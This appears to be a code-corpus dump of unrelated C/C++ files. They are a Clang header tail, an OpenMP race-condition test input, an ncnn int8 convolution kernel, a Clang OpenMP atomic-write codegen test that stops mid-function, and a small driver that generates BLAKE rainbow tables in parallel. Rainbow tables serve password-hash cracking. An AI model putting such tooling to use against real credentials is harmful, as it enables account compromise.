/// The template function declaration to be late parsed.
Decl *D;
};
} // end namespace clang
namespace llvm {
// Hash a FunctionDeclAndLoc by looking at both its FunctionDecl and its
// SourceLocation.
template <> struct DenseMapInfo<clang::Sema::FunctionDeclAndLoc> {
using FunctionDeclAndLoc = clang::Sema::FunctionDeclAndLoc;
using FDBaseInfo = DenseMapInfo<clang::CanonicalDeclPtr<clang::FunctionDecl>>;
static FunctionDeclAndLoc getEmptyKey() {
return {FDBaseInfo::getEmptyKey(), clang::SourceLocation()};
}
static FunctionDeclAndLoc getTombstoneKey() {
return {FDBaseInfo::getTombstoneKey(), clang::SourceLocation()};
}
static unsigned getHashValue(const FunctionDeclAndLoc &FDL) {
return hash_combine(FDBaseInfo::getHashValue(FDL.FD),
FDL.Loc.getRawEncoding());
}
static bool isEqual(const FunctionDeclAndLoc &LHS,
const FunctionDeclAndLoc &RHS) {
return LHS.FD == RHS.FD && LHS.Loc == RHS.Loc;
}
};
} // namespace llvm
#endif
|
cs-enforcer.c | int main() {
int X;
#pragma omp parallel
{
int i;
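/* The three sections below all update the shared, uninitialized variable X
   without any synchronization, so they race with one another; given the
   file name, this appears to be deliberate input for a critical-section
   checker rather than an oversight. */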
#pragma omp sections
{
#pragma omp section
X = X + 1;
#pragma omp section
X = X - 1;
#pragma omp section
for (i = 0; i < 10; i++)
X++;
}
}
}
|
mainRT.c | #include <stdio.h>
#include <stdlib.h>
#include <time.h>
#include <omp.h>
#include "blake.h"
#include "createRT.h"
int main(int argc, char **argv) {
/* atoi() would turn a negative argument into a huge size_t value, so parse
   into a signed type first and fall back to the default for non-positive input. */
long requested_size = (argc == 2) ? atol(argv[1]) : (long)RAINBOW_SIZE;
size_t rainbow_size = (requested_size > 0) ? (size_t)requested_size : RAINBOW_SIZE;
srand((unsigned) time(NULL));
size_t table_id;
size_t num_of_tables = NUM_OF_TABLES;
size_t chain_len = CHAIN_LEN;
/* Parallel creation of NUM_OF_TABLES rainbow tables */
#pragma omp parallel for
for (table_id = 0 ; table_id < num_of_tables ; table_id++) {
printf("creating %zu of %zu\n", table_id, num_of_tables);
create_RT(rainbow_size, table_id, chain_len);
}
return EXIT_SUCCESS;
}
|
convolution_1x1_pack8to4_int8.h | // Tencent is pleased to support the open source community by making ncnn available.
//
// Copyright (C) 2022 THL A29 Limited, a Tencent company. All rights reserved.
//
// Licensed under the BSD 3-Clause License (the "License"); you may not use this file except
// in compliance with the License. You may obtain a copy of the License at
//
// https://opensource.org/licenses/BSD-3-Clause
//
// Unless required by applicable law or agreed to in writing, software distributed
// under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
// CONDITIONS OF ANY KIND, either express or implied. See the License for the
// specific language governing permissions and limitations under the License.
static void conv1x1s1_sgemm_pack8to4_int8_msa(const Mat& bottom_blob, Mat& top_blob, const Mat& kernel, const Option& opt)
{
int w = bottom_blob.w;
int h = bottom_blob.h;
const int size = w * h;
Mat bottom_im2col = bottom_blob;
bottom_im2col.w = size;
bottom_im2col.h = 1;
im2col_sgemm_pack8to4_int8_msa(bottom_im2col, top_blob, kernel, opt);
}
static void conv1x1s2_sgemm_pack8to4_int8_msa(const Mat& bottom_blob, Mat& top_blob, const Mat& kernel, const Option& opt)
{
int w = bottom_blob.w;
int channels = bottom_blob.c;
size_t elemsize = bottom_blob.elemsize;
int elempack = bottom_blob.elempack;
int outw = top_blob.w;
int outh = top_blob.h;
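// tailstep: after reading outw elements at horizontal stride 2 the row
// pointer has advanced 2 * outw, so skip the rest of that row plus one
// full row, (w - 2 * outw) + w, because the vertical stride is also 2.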
const int tailstep = w - 2 * outw + w;
Mat bottom_blob_shrinked;
bottom_blob_shrinked.create(outw, outh, channels, elemsize, elempack, opt.workspace_allocator);
#pragma omp parallel for num_threads(opt.num_threads)
for (int p = 0; p < channels; p++)
{
const int64_t* r0 = bottom_blob.channel(p);
int64_t* outptr = bottom_blob_shrinked.channel(p);
for (int i = 0; i < outh; i++)
{
int j = 0;
for (; j < outw; j++)
{
outptr[0] = r0[0];
r0 += 2;
outptr += 1;
}
r0 += tailstep;
}
}
conv1x1s1_sgemm_pack8to4_int8_msa(bottom_blob_shrinked, top_blob, kernel, opt);
}
|
atomic_write_codegen.c | // RUN: %clang_cc1 -no-opaque-pointers -verify -triple x86_64-apple-darwin10 -target-cpu core2 -fopenmp -x c -emit-llvm %s -o - | FileCheck %s
// RUN: %clang_cc1 -no-opaque-pointers -fopenmp -x c -triple x86_64-apple-darwin10 -target-cpu core2 -emit-pch -o %t %s
// RUN: %clang_cc1 -no-opaque-pointers -fopenmp -x c -triple x86_64-apple-darwin10 -target-cpu core2 -include-pch %t -verify %s -emit-llvm -o - | FileCheck %s
// RUN: %clang_cc1 -no-opaque-pointers -verify -triple x86_64-apple-darwin10 -target-cpu core2 -fopenmp-simd -x c -emit-llvm %s -o - | FileCheck --check-prefix SIMD-ONLY0 %s
// RUN: %clang_cc1 -no-opaque-pointers -fopenmp-simd -x c -triple x86_64-apple-darwin10 -target-cpu core2 -emit-pch -o %t %s
// RUN: %clang_cc1 -no-opaque-pointers -fopenmp-simd -x c -triple x86_64-apple-darwin10 -target-cpu core2 -include-pch %t -verify %s -emit-llvm -o - | FileCheck --check-prefix SIMD-ONLY0 %s
// SIMD-ONLY0-NOT: {{__kmpc|__tgt}}
// expected-no-diagnostics
// REQUIRES: x86-registered-target
#ifndef HEADER
#define HEADER
_Bool bv, bx;
char cv, cx;
unsigned char ucv, ucx;
short sv, sx;
unsigned short usv, usx;
int iv, ix;
unsigned int uiv, uix;
long lv, lx;
unsigned long ulv, ulx;
long long llv, llx;
unsigned long long ullv, ullx;
float fv, fx;
double dv, dx;
long double ldv, ldx;
_Complex int civ, cix;
_Complex float cfv, cfx;
_Complex double cdv, cdx;
typedef int int4 __attribute__((__vector_size__(16)));
int4 int4x;
struct BitFields {
int : 32;
int a : 31;
} bfx;
struct BitFields_packed {
int : 32;
int a : 31;
} __attribute__ ((__packed__)) bfx_packed;
struct BitFields2 {
int : 31;
int a : 1;
} bfx2;
struct BitFields2_packed {
int : 31;
int a : 1;
} __attribute__ ((__packed__)) bfx2_packed;
struct BitFields3 {
int : 11;
int a : 14;
} bfx3;
struct BitFields3_packed {
int : 11;
int a : 14;
} __attribute__ ((__packed__)) bfx3_packed;
struct BitFields4 {
short : 16;
int a: 1;
long b : 7;
} bfx4;
struct BitFields4_packed {
short : 16;
int a: 1;
long b : 7;
} __attribute__ ((__packed__)) bfx4_packed;
typedef float float2 __attribute__((ext_vector_type(2)));
float2 float2x;
// Register "0" is currently an invalid register for global register variables.
// Use "esp" instead of "0".
// register int rix __asm__("0");
register int rix __asm__("esp");
int main(void) {
// CHECK: store atomic i32 1, i32* getelementptr inbounds ({ i32, i32 }, { i32, i32 }* @civ, i32 0, i32 1) monotonic, align 4
#pragma omp atomic write
__imag(civ) = 1;
// CHECK: load i8, i8*
// CHECK: store atomic i8 {{.*}} monotonic, align 1
#pragma omp atomic write
bx = bv;
// CHECK: load i8, i8*
// CHECK: store atomic i8 {{.*}} release, align 1
#pragma omp atomic write release
cx = cv;
// CHECK: load i8, i8*
// CHECK: store atomic i8 {{.*}} monotonic, align 1
#pragma omp atomic write
ucx = ucv;
// CHECK: load i16, i16*
// CHECK: store atomic i16 {{.*}} monotonic, align 2
#pragma omp atomic write
sx = sv;
// CHECK: load i16, i16*
// CHECK: store atomic i16 {{.*}} monotonic, align 2
#pragma omp atomic write
usx = usv;
// CHECK: load i32, i32*
// CHECK: store atomic i32 {{.*}} monotonic, align 4
#pragma omp atomic write
ix = iv;
// CHECK: load i32, i32*
// CHECK: store atomic i32 {{.*}} monotonic, align 4
#pragma omp atomic write
uix = uiv;
// CHECK: load i64, i64*
// CHECK: store atomic i64 {{.*}} monotonic, align 8
#pragma omp atomic write
lx = lv;
// CHECK: load i64, i64*
// CHECK: store atomic i64 {{.*}} monotonic, align 8
#pragma omp atomic write
ulx = ulv;
// CHECK: load i64, i64*
// CHECK: store atomic i64 {{.*}} monotonic, align 8
#pragma omp atomic write
llx = llv;
// CHECK: load i64, i64*
// CHECK: store atomic i64 {{.*}} monotonic, align 8
#pragma omp atomic write
ullx = ullv;
// CHECK: load float, float*
// CHECK: bitcast float {{.*}} to i32
// CHECK: store atomic i32 {{.*}}, i32* bitcast (float* {{.*}} monotonic, align 4
#pragma omp atomic write
fx = fv;
// CHECK: load double, double*
// CHECK: bitcast double {{.*}} to i64
// CHECK: store atomic i64 {{.*}}, i64* bitcast (double* {{.*}} monotonic, align 8
#pragma omp atomic write
dx = dv;
// CHECK: [[LD:%.+]] = load x86_fp80, x86_fp80*
// CHECK: [[BITCAST:%.+]] = bitcast x86_fp80* [[LDTEMP:%.*]] to i8*
// CHECK: call void @llvm.memset.p0i8.i64(i8* align 16 [[BITCAST]], i8 0, i64 16, i1 false)
// CHECK: store x86_fp80 [[LD]], x86_fp80* [[LDTEMP]]
// CHECK: [[BITCAST:%.+]] = bitcast x86_fp80* [[LDTEMP:%.*]] to i128*
// CHECK: [[LD:%.+]] = load i128, i128* [[BITCAST]]
// CHECK: store atomic i128 [[LD]], i128* bitcast (x86_fp80* {{.*}} monotonic, align 16
#pragma omp atomic write
ldx = ldv;
// CHECK: [[REAL_VAL:%.+]] = load i32, i32* getelementptr inbounds ({ i32, i32 }, { i32, i32 }* @{{.*}}, i32 0, i32 0)
// CHECK: [[IMG_VAL:%.+]] = load i32, i32* getelementptr inbounds ({ i32, i32 }, { i32, i32 }* @{{.*}}, i32 0, i32 1)
// CHECK: [[TEMP_REAL_REF:%.+]] = getelementptr inbounds { i32, i32 }, { i32, i32 }* [[TEMP:%.+]], i32 0, i32 0
// CHECK: [[TEMP_IMG_REF:%.+]] = getelementptr inbounds { i32, i32 }, { i32, i32 }* [[TEMP]], i32 0, i32 1
// CHECK: store i32 [[REAL_VAL]], i32* [[TEMP_REAL_REF]]
// CHECK: store i32 [[IMG_VAL]], i32* [[TEMP_IMG_REF]]
// CHECK: [[BITCAST:%.+]] = bitcast { i32, i32 }* [[TEMP]] to i8*
// CHECK: call void @__atomic_store(i64 noundef 8, i8* noundef bitcast ({ i32, i32 }* @{{.*}} to i8*), i8* noundef [[BITCAST]], i32 noundef 0)
#pragma omp atomic write
cix = civ;
// CHECK: [[REAL_VAL:%.+]] = load float, float* getelementptr inbounds ({ float, float }, { float, float }* @{{.*}}, i32 0, i32 0)
// CHECK: [[IMG_VAL:%.+]] = load float, float* getelementptr inbounds ({ float, float }, { float, float }* @{{.*}}, i32 0, i32 1)
// CHECK: [[TEMP_REAL_REF:%.+]] = getelementptr inbounds { float, float }, { float, float }* [[TEMP:%.+]], i32 0, i32 0
// CHECK: [[TEMP_IMG_REF:%.+]] = getelementptr inbounds { float, float }, { float, float }* [[TEMP]], i32 0, i32 1
// CHECK: store float [[REAL_VAL]], float* [[TEMP_REAL_REF]]
// CHECK: store float [[IMG_VAL]], float* [[TEMP_IMG_REF]]
// CHECK: [[BITCAST:%.+]] = bitcast { float, float }* [[TEMP]] to i8*
// CHECK: call void @__atomic_store(i64 noundef 8, i8* noundef bitcast ({ float, float }* @{{.*}} to i8*), i8* noundef [[BITCAST]], i32 noundef 0)
#pragma omp atomic write
cfx = cfv;
// CHECK: [[REAL_VAL:%.+]] = load double, double* getelementptr inbounds ({ double, double }, { double, double }* @{{.*}}, i32 0, i32 0)
// CHECK: [[IMG_VAL:%.+]] = load double, double* getelementptr inbounds ({ double, double }, { double, double }* @{{.*}}, i32 0, i32 1)
// CHECK: [[TEMP_REAL_REF:%.+]] = getelementptr inbounds { double, double }, { double, double }* [[TEMP:%.+]], i32 0, i32 0
// CHECK: [[TEMP_IMG_REF:%.+]] = getelementptr inbounds { double, double }, { double, double }* [[TEMP]], i32 0, i32 1
// CHECK: store double [[REAL_VAL]], double* [[TEMP_REAL_REF]]
// CHECK: store double [[IMG_VAL]], double* [[TEMP_IMG_REF]]
// CHECK: [[BITCAST:%.+]] = bitcast { double, double }* [[TEMP]] to i8*
// CHECK: call void @__atomic_store(i64 noundef 16, i8* noundef bitcast ({ double, double }* @{{.*}} to i8*), i8* noundef [[BITCAST]], i32 noundef 5)
// CHECK: call{{.*}} @__kmpc_flush(
#pragma omp atomic seq_cst write
cdx = cdv;
// CHECK: load i8, i8*
// CHECK: store atomic i64 {{.*}} monotonic, align 8
#pragma omp atomic write
ulx = bv;
// CHECK: load i8, i8*
// CHECK: store atomic i8 {{.*}} monotonic, align 1
#pragma omp atomic write
bx = cv;
// CHECK: load i8, i8*
// CHECK: store atomic i8 {{.*}} seq_cst, align 1
// CHECK: call{{.*}} @__kmpc_flush(
#pragma omp atomic write, seq_cst
cx = ucv;
// CHECK: load i16, i16*
// CHECK: store atomic i64 {{.*}} monotonic, align 8
#pragma omp atomic write
ulx = sv;
// CHECK: load i16, i16*
// CHECK: store atomic i64 {{.*}} monotonic, align 8
#pragma omp atomic write
lx = usv;
// CHECK: load i32, i32*
// CHECK: store atomic i32 {{.*}} seq_cst, align 4
// CHECK: call{{.*}} @__kmpc_flush(
#pragma omp atomic seq_cst, write
uix = iv;
// CHECK: load i32, i32*
// CHECK: store atomic i32 {{.*}} monotonic, align 4
#pragma omp atomic write
ix = uiv;
// CHECK: load i64, i64*
// CHECK: [[VAL:%.+]] = trunc i64 %{{.*}} to i32
// CHECK: [[TEMP_REAL_REF:%.+]] = getelementptr inbounds { i32, i32 }, { i32, i32 }* [[TEMP:%.+]], i32 0, i32 0
// CHECK: [[TEMP_IMG_REF:%.+]] = getelementptr inbounds { i32, i32 }, { i32, i32 }* [[TEMP]], i32 0, i32 1
// CHECK: store i32 [[VAL]], i32* [[TEMP_REAL_REF]]
// CHECK: store i32 0, i32* [[TEMP_IMG_REF]]
// CHECK: [[BITCAST:%.+]] = bitcast { i32, i32 }* [[TEMP]] to i8*
// CHECK: call void @__atomic_store(i64 noundef 8, i8* noundef bitcast ({ i32, i32 }* @{{.+}} to i8*), i8* noundef [[BITCAST]], i32 noundef 0)
#pragma omp atomic write
cix = lv;
// CHECK: load i64, i64*
// CHECK: store atomic i32 %{{.+}}, i32* bitcast (float* {{.*}} monotonic, align 4
#pragma omp atomic write
fx = ulv;
// CHECK: load i64, i64*
// CHECK: store atomic i64 %{{.+}}, i64* bitcast (double* {{.*}} monotonic, align 8
#pragma omp atomic write
dx = llv;
// CHECK: load i64, i64*
// CHECK: [[VAL:%.+]] = uitofp i64 %{{.+}} to x86_fp80
// CHECK: [[BITCAST:%.+]] = bitcast x86_fp80* [[TEMP:%.+]] to i8*
// CHECK: call void @llvm.memset.p0i8.i64(i8* align 16 [[BITCAST]], i8 0, i64 16, i1 false)
// CHECK: store x86_fp80 [[VAL]], x86_fp80* [[TEMP]]
// CHECK: [[BITCAST:%.+]] = bitcast x86_fp80* [[TEMP]] to i128*
// CHECK: [[VAL:%.+]] = load i128, i128* [[BITCAST]]
// CHECK: store atomic i128 [[VAL]], i128* bitcast (x86_fp80* {{.*}} monotonic, align 16
#pragma omp atomic write
ldx = ullv;
// CHECK: load float, float*
// CHECK: [[VAL:%.+]] = fptosi float %{{.*}} to i32
// CHECK: [[TEMP_REAL_REF:%.+]] = getelementptr inbounds { i32, i32 }, { i32, i32 }* [[TEMP:%.+]], i32 0, i32 0
// CHECK: [[TEMP_IMG_REF:%.+]] = getelementptr inbounds { i32, i32 }, { i32, i32 }* [[TEMP]], i32 0, i32 1
// CHECK: store i32 [[VAL]], i32* [[TEMP_REAL_REF]]
// CHECK: store i32 0, i32* [[TEMP_IMG_REF]]
// CHECK: [[BITCAST:%.+]] = bitcast { i32, i32 }* [[TEMP]] to i8*
// CHECK: call void @__atomic_store(i64 noundef 8, i8* noundef bitcast ({ i32, i32 }* @{{.+}} to i8*), i8* noundef [[BITCAST]], i32 noundef 0)
#pragma omp atomic write
cix = fv;
// CHECK: load double, double*
// CHECK: store atomic i16 {{.*}} monotonic, align 2
#pragma omp atomic write
sx = dv;
// CHECK: load x86_fp80, x86_fp80*
// CHECK: store atomic i8 {{.*}} monotonic, align 1
#pragma omp atomic write
bx = ldv;
// CHECK: load i32, i32* getelementptr inbounds ({ i32, i32 }, { i32, i32 }* @{{.+}}, i32 0, i32 0)
// CHECK: load i32, i32* getelementptr inbounds ({ i32, i32 }, { i32, i32 }* @{{.+}}, i32 0, i32 1)
// CHECK: icmp ne i32 %{{.+}}, 0
// CHECK: icmp ne i32 %{{.+}}, 0
// CHECK: or i1
// CHECK: store atomic i8 {{.*}} monotonic, align 1
#pragma omp atomic write
bx = civ;
// CHECK: load float, float* getelementptr inbounds ({ float, float }, { float, float }* @{{.*}}, i32 0, i32 0)
// CHECK: store atomic i16 {{.*}} monotonic, align 2
#pragma omp atomic write
usx = cfv;
// CHECK: load double, double* getelementptr inbounds ({ double, double }, { double, double }* @{{.+}}, i32 0, i32 0)
// CHECK: store atomic i64 {{.*}} monotonic, align 8
#pragma omp atomic write
llx = cdv;
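// Writing one element of the <4 x i32> global at a runtime index has no
// native atomic form, so it is lowered to a cmpxchg retry loop: load the
// whole vector as i128, insertelement into a local copy, and cmpxchg the
// 128-bit image until the exchange succeeds.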
// CHECK-DAG: [[IDX:%.+]] = load i16, i16* @{{.+}}
// CHECK-DAG: load i8, i8*
// CHECK-DAG: [[VEC_ITEM_VAL:%.+]] = zext i1 %{{.+}} to i32
// CHECK: [[I128VAL:%.+]] = load atomic i128, i128* bitcast (<4 x i32>* [[DEST:@.+]] to i128*) monotonic, align 16
// CHECK: br label %[[CONT:.+]]
// CHECK: [[CONT]]
// CHECK: [[OLD_I128:%.+]] = phi i128 [ [[I128VAL]], %{{.+}} ], [ [[FAILED_I128_OLD_VAL:%.+]], %[[CONT]] ]
// CHECK: [[BITCAST:%.+]] = bitcast <4 x i32>* [[LDTEMP:%.+]] to i128*
// CHECK: store i128 [[OLD_I128]], i128* [[BITCAST]],
// CHECK: [[VEC_VAL:%.+]] = load <4 x i32>, <4 x i32>* [[LDTEMP]]
// CHECK: [[NEW_VEC_VAL:%.+]] = insertelement <4 x i32> [[VEC_VAL]], i32 [[VEC_ITEM_VAL]], i16 [[IDX]]
// CHECK: store <4 x i32> [[NEW_VEC_VAL]], <4 x i32>* [[LDTEMP]]
// CHECK: [[NEW_I128:%.+]] = load i128, i128* [[BITCAST]]
// CHECK: [[RES:%.+]] = cmpxchg i128* bitcast (<4 x i32>* [[DEST]] to i128*), i128 [[OLD_I128]], i128 [[NEW_I128]] monotonic monotonic, align 16
// CHECK: [[FAILED_I128_OLD_VAL:%.+]] = extractvalue { i128, i1 } [[RES]], 0
// CHECK: [[FAIL_SUCCESS:%.+]] = extractvalue { i128, i1 } [[RES]], 1
// CHECK: br i1 [[FAIL_SUCCESS]], label %[[EXIT:.+]], label %[[CONT]]
// CHECK: [[EXIT]]
#pragma omp atomic write
int4x[sv] = bv;
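// The bit-field writes below are read-modify-write sequences on the
// containing addressable unit: a mask-and-or updates the field inside a
// cmpxchg retry loop. Units with a native atomic width use cmpxchg directly;
// units whose size or alignment has no native form fall back to the
// __atomic_load/__atomic_compare_exchange libcalls.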
// CHECK: load x86_fp80, x86_fp80* @{{.+}}
// CHECK: [[NEW_VAL:%.+]] = fptosi x86_fp80 %{{.+}} to i32
// CHECK: [[PREV_VALUE:%.+]] = load atomic i32, i32* bitcast (i8* getelementptr (i8, i8* bitcast (%struct.BitFields* @{{.+}} to i8*), i64 4) to i32*) monotonic, align 4
// CHECK: br label %[[CONT:.+]]
// CHECK: [[CONT]]
// CHECK: [[OLD_BF_VALUE:%.+]] = phi i32 [ [[PREV_VALUE]], %[[EXIT]] ], [ [[FAILED_OLD_VAL:%.+]], %[[CONT]] ]
// CHECK: [[BF_VALUE:%.+]] = and i32 [[NEW_VAL]], 2147483647
// CHECK: [[BF_CLEAR:%.+]] = and i32 %{{.+}}, -2147483648
// CHECK: or i32 [[BF_CLEAR]], [[BF_VALUE]]
// CHECK: store i32 %{{.+}}, i32* [[LDTEMP:%.+]]
// CHECK: [[NEW_BF_VALUE:%.+]] = load i32, i32* [[LDTEMP]]
// CHECK: [[RES:%.+]] = cmpxchg i32* bitcast (i8* getelementptr (i8, i8* bitcast (%struct.BitFields* @{{.+}} to i8*), i64 4) to i32*), i32 [[OLD_BF_VALUE]], i32 [[NEW_BF_VALUE]] monotonic monotonic, align 4
// CHECK: [[FAILED_OLD_VAL]] = extractvalue { i32, i1 } [[RES]], 0
// CHECK: [[FAIL_SUCCESS:%.+]] = extractvalue { i32, i1 } [[RES]], 1
// CHECK: br i1 [[FAIL_SUCCESS]], label %[[EXIT:.+]], label %[[CONT]]
// CHECK: [[EXIT]]
#pragma omp atomic write
bfx.a = ldv;
// CHECK: load x86_fp80, x86_fp80* @{{.+}}
// CHECK: [[NEW_VAL:%.+]] = fptosi x86_fp80 %{{.+}} to i32
// CHECK: [[BITCAST:%.+]] = bitcast i32* [[LDTEMP:%.+]] to i8*
// CHECK: call void @__atomic_load(i64 noundef 4, i8* noundef getelementptr (i8, i8* bitcast (%struct.BitFields_packed* @{{.+}} to i8*), i64 4), i8* noundef [[BITCAST]], i32 noundef 0)
// CHECK: br label %[[CONT:.+]]
// CHECK: [[CONT]]
// CHECK: [[OLD_BF_VALUE:%.+]] = load i32, i32* [[LDTEMP]],
// CHECK: store i32 [[OLD_BF_VALUE]], i32* [[LDTEMP1:%.+]],
// CHECK: [[OLD_BF_VALUE:%.+]] = load i32, i32* [[LDTEMP1]],
// CHECK: [[BF_VALUE:%.+]] = and i32 [[NEW_VAL]], 2147483647
// CHECK: [[BF_CLEAR:%.+]] = and i32 [[OLD_BF_VALUE]], -2147483648
// CHECK: or i32 [[BF_CLEAR]], [[BF_VALUE]]
// CHECK: store i32 %{{.+}}, i32* [[LDTEMP1]]
// CHECK: [[BITCAST_TEMP_OLD_BF_ADDR:%.+]] = bitcast i32* [[LDTEMP]] to i8*
// CHECK: [[BITCAST_TEMP_NEW_BF_ADDR:%.+]] = bitcast i32* [[LDTEMP1]] to i8*
// CHECK: [[FAIL_SUCCESS:%.+]] = call zeroext i1 @__atomic_compare_exchange(i64 noundef 4, i8* noundef getelementptr (i8, i8* bitcast (%struct.BitFields_packed* @{{.+}} to i8*), i64 4), i8* noundef [[BITCAST_TEMP_OLD_BF_ADDR]], i8* noundef [[BITCAST_TEMP_NEW_BF_ADDR]], i32 noundef 0, i32 noundef 0)
// CHECK: br i1 [[FAIL_SUCCESS]], label %[[EXIT:.+]], label %[[CONT]]
// CHECK: [[EXIT]]
#pragma omp atomic write
bfx_packed.a = ldv;
// CHECK: load x86_fp80, x86_fp80* @{{.+}}
// CHECK: [[NEW_VAL:%.+]] = fptosi x86_fp80 %{{.+}} to i32
// CHECK: [[PREV_VALUE:%.+]] = load atomic i32, i32* getelementptr inbounds (%struct.BitFields2, %struct.BitFields2* @{{.+}}, i32 0, i32 0) monotonic, align 4
// CHECK: br label %[[CONT:.+]]
// CHECK: [[CONT]]
// CHECK: [[OLD_BF_VALUE:%.+]] = phi i32 [ [[PREV_VALUE]], %[[EXIT]] ], [ [[FAILED_OLD_VAL:%.+]], %[[CONT]] ]
// CHECK: [[BF_AND:%.+]] = and i32 [[NEW_VAL]], 1
// CHECK: [[BF_VALUE:%.+]] = shl i32 [[BF_AND]], 31
// CHECK: [[BF_CLEAR:%.+]] = and i32 %{{.+}}, 2147483647
// CHECK: or i32 [[BF_CLEAR]], [[BF_VALUE]]
// CHECK: store i32 %{{.+}}, i32* [[LDTEMP:%.+]]
// CHECK: [[NEW_BF_VALUE:%.+]] = load i32, i32* [[LDTEMP]]
// CHECK: [[RES:%.+]] = cmpxchg i32* getelementptr inbounds (%struct.BitFields2, %struct.BitFields2* @{{.+}}, i32 0, i32 0), i32 [[OLD_BF_VALUE]], i32 [[NEW_BF_VALUE]] monotonic monotonic, align 4
// CHECK: [[FAILED_OLD_VAL]] = extractvalue { i32, i1 } [[RES]], 0
// CHECK: [[FAIL_SUCCESS:%.+]] = extractvalue { i32, i1 } [[RES]], 1
// CHECK: br i1 [[FAIL_SUCCESS]], label %[[EXIT:.+]], label %[[CONT]]
// CHECK: [[EXIT]]
#pragma omp atomic write
bfx2.a = ldv;
// CHECK: load x86_fp80, x86_fp80* @{{.+}}
// CHECK: [[NEW_VAL:%.+]] = fptosi x86_fp80 %{{.+}} to i32
// CHECK: [[PREV_VALUE:%.+]] = load atomic i8, i8* getelementptr (i8, i8* bitcast (%struct.BitFields2_packed* @{{.+}} to i8*), i64 3) monotonic, align 1
// CHECK: br label %[[CONT:.+]]
// CHECK: [[CONT]]
// CHECK: [[OLD_BF_VALUE:%.+]] = phi i8 [ [[PREV_VALUE]], %[[EXIT]] ], [ [[FAILED_OLD_VAL:%.+]], %[[CONT]] ]
// CHECK: [[TRUNC:%.+]] = trunc i32 [[NEW_VAL]] to i8
// CHECK: [[BF_AND:%.+]] = and i8 [[TRUNC]], 1
// CHECK: [[BF_VALUE:%.+]] = shl i8 [[BF_AND]], 7
// CHECK: [[BF_CLEAR:%.+]] = and i8 %{{.+}}, 127
// CHECK: or i8 [[BF_CLEAR]], [[BF_VALUE]]
// CHECK: store i8 %{{.+}}, i8* [[LDTEMP:%.+]]
// CHECK: [[NEW_BF_VALUE:%.+]] = load i8, i8* [[LDTEMP]]
// CHECK: [[RES:%.+]] = cmpxchg i8* getelementptr (i8, i8* bitcast (%struct.BitFields2_packed* @{{.+}} to i8*), i64 3), i8 [[OLD_BF_VALUE]], i8 [[NEW_BF_VALUE]] monotonic monotonic, align 1
// CHECK: [[FAILED_OLD_VAL]] = extractvalue { i8, i1 } [[RES]], 0
// CHECK: [[FAIL_SUCCESS:%.+]] = extractvalue { i8, i1 } [[RES]], 1
// CHECK: br i1 [[FAIL_SUCCESS]], label %[[EXIT:.+]], label %[[CONT]]
// CHECK: [[EXIT]]
#pragma omp atomic write
bfx2_packed.a = ldv;
// CHECK: load x86_fp80, x86_fp80* @{{.+}}
// CHECK: [[NEW_VAL:%.+]] = fptosi x86_fp80 %{{.+}} to i32
// CHECK: [[PREV_VALUE:%.+]] = load atomic i32, i32* getelementptr inbounds (%struct.BitFields3, %struct.BitFields3* @{{.+}}, i32 0, i32 0) monotonic, align 4
// CHECK: br label %[[CONT:.+]]
// CHECK: [[CONT]]
// CHECK: [[OLD_BF_VALUE:%.+]] = phi i32 [ [[PREV_VALUE]], %[[EXIT]] ], [ [[FAILED_OLD_VAL:%.+]], %[[CONT]] ]
// CHECK: [[BF_AND:%.+]] = and i32 [[NEW_VAL]], 16383
// CHECK: [[BF_VALUE:%.+]] = shl i32 [[BF_AND]], 11
// CHECK: [[BF_CLEAR:%.+]] = and i32 %{{.+}}, -33552385
// CHECK: or i32 [[BF_CLEAR]], [[BF_VALUE]]
// CHECK: store i32 %{{.+}}, i32* [[LDTEMP:%.+]]
// CHECK: [[NEW_BF_VALUE:%.+]] = load i32, i32* [[LDTEMP]]
// CHECK: [[RES:%.+]] = cmpxchg i32* getelementptr inbounds (%struct.BitFields3, %struct.BitFields3* @{{.+}}, i32 0, i32 0), i32 [[OLD_BF_VALUE]], i32 [[NEW_BF_VALUE]] monotonic monotonic, align 4
// CHECK: [[FAILED_OLD_VAL]] = extractvalue { i32, i1 } [[RES]], 0
// CHECK: [[FAIL_SUCCESS:%.+]] = extractvalue { i32, i1 } [[RES]], 1
// CHECK: br i1 [[FAIL_SUCCESS]], label %[[EXIT:.+]], label %[[CONT]]
// CHECK: [[EXIT]]
#pragma omp atomic write
bfx3.a = ldv;
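// bfx3_packed's field straddles 3 bytes, a width with no native cmpxchg, so
// the update is performed on an i24 temporary through the __atomic_load and
// __atomic_compare_exchange libcalls (size argument 3).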
// CHECK: load x86_fp80, x86_fp80* @{{.+}}
// CHECK: [[NEW_VAL:%.+]] = fptosi x86_fp80 %{{.+}} to i32
// CHECK: [[LDTEMP:%.+]] = bitcast i32* %{{.+}} to i24*
// CHECK: [[BITCAST:%.+]] = bitcast i24* %{{.+}} to i8*
// CHECK: call void @__atomic_load(i64 noundef 3, i8* noundef getelementptr (i8, i8* bitcast (%struct.BitFields3_packed* @{{.+}} to i8*), i64 1), i8* noundef [[BITCAST]], i32 noundef 0)
// CHECK: br label %[[CONT:.+]]
// CHECK: [[CONT]]
// CHECK: [[OLD_VAL:%.+]] = load i24, i24* %{{.+}},
// CHECK: store i24 [[OLD_VAL]], i24* [[TEMP:%.+]],
// CHECK: [[TRUNC:%.+]] = trunc i32 [[NEW_VAL]] to i24
// CHECK: [[BF_AND:%.+]] = and i24 [[TRUNC]], 16383
// CHECK: [[BF_VALUE:%.+]] = shl i24 [[BF_AND]], 3
// CHECK: [[BF_CLEAR:%.+]] = and i24 %{{.+}}, -131065
// CHECK: or i24 [[BF_CLEAR]], [[BF_VALUE]]
// CHECK: store i24 %{{.+}}, i24* [[TEMP]]
// CHECK: [[BITCAST_TEMP_OLD_BF_ADDR:%.+]] = bitcast i24* [[LDTEMP]] to i8*
// CHECK: [[BITCAST_TEMP_NEW_BF_ADDR:%.+]] = bitcast i24* [[TEMP]] to i8*
// CHECK: [[FAIL_SUCCESS:%.+]] = call zeroext i1 @__atomic_compare_exchange(i64 noundef 3, i8* noundef getelementptr (i8, i8* bitcast (%struct.BitFields3_packed* @{{.+}} to i8*), i64 1), i8* noundef [[BITCAST_TEMP_OLD_BF_ADDR]], i8* noundef [[BITCAST_TEMP_NEW_BF_ADDR]], i32 noundef 0, i32 noundef 0)
// CHECK: br i1 [[FAIL_SUCCESS]], label %[[EXIT:.+]], label %[[CONT]]
// CHECK: [[EXIT]]
#pragma omp atomic write
bfx3_packed.a = ldv;
// CHECK: load x86_fp80, x86_fp80* @{{.+}}
// CHECK: [[NEW_VAL:%.+]] = fptosi x86_fp80 %{{.+}} to i32
